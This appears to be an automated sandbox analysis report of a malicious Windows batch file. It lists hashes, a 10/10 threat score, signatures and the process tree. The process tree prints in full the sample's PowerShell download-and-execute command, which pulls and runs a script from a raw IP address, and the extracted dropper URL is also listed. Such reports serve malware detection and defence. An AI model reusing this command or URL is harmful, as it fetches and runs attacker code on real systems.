Analysis
-
max time kernel
114s -
max time network
137s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
08-06-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
834fe3c10a5c6788c12a8dfd6b3a22bc.bat
-
Size
219B
-
MD5
9aeae02203b8a1236ef5aa06a8df49df
-
SHA1
f33e529e1dd812bd81e80fcc6b08c5d019184c74
-
SHA256
4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7
-
SHA512
fdfe723f2cbf8c3f3b1a8b4211955bc60bf24f98ac81a719821e52ed5883cbdbf8b872107b5b4ae1ae5f3a6477f201f59c9452641624f4f06a61358b8013dc6e
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3688 2812 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3688 WerFault.exe Token: SeBackupPrivilege 3688 WerFault.exe Token: SeDebugPrivilege 3688 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"1⤵PID:2532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000"2⤵PID:2812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3688